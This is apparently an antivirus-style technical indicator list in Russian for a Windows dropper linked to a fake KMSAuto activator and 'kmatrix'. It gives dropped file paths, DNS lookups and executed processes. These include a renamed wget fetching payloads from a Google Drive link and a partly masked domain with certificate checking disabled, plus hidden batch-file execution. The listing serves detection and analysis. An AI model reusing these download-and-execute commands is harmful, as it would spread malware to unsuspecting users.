Техническая информация
- %TEMP%\$inst\2.tmp
- %APPDATA%\kmatrix\kmatrix.exe
- %WINDIR%\win10.bat
- %WINDIR%\winfo.bat
- %WINDIR%\wupdates.bat
- %WINDIR%\nhmb.exe
- %WINDIR%\kmsauto.ini
- %WINDIR%\kmsauto net.exe
- %WINDIR%\n.exe
- %WINDIR%\c\cu.exe
- %WINDIR%\w\w.exe
- %WINDIR%\w\libssl32.dll
- %WINDIR%\w\libintl3.dll
- %WINDIR%\w\libiconv2.dll
- %WINDIR%\w\libeay32.dll
- %WINDIR%\s.txt
- %WINDIR%\a_k.bat
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\0001.tmp
- %WINDIR%\1rhr7kn9iqb5_rispuepu6e2u3cgkybaz@e=download
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\0001.tmp
- %TEMP%\$inst\2.tmp
- %WINDIR%\1rhr7kn9iqb5_rispuepu6e2u3cgkybaz@e=download
- http://kk#.##dmatix.com/r/b
- DNS ASK drive.google.com
- DNS ASK do#########ocs.googleusercontent.com
- DNS ASK kk#.##dmatix.com
- '%APPDATA%\kmatrix\kmatrix.exe'
- '%WINDIR%\w\w.exe' -c -P "%WINDIR%" "https://drive.google.com/u/0/uc?id=1rHR7kN9iQB5_RISPuepU6e2u3CgkYBaZ&export=download" --no-check-certificate
- '%WINDIR%\w\w.exe' -c -P "%WINDIR%" "http://kk#.##dmatix.com/r/b" --referer="0101010010" --user-agent="kmatrix_56"
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\a_k.bat" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\a_k.bat" "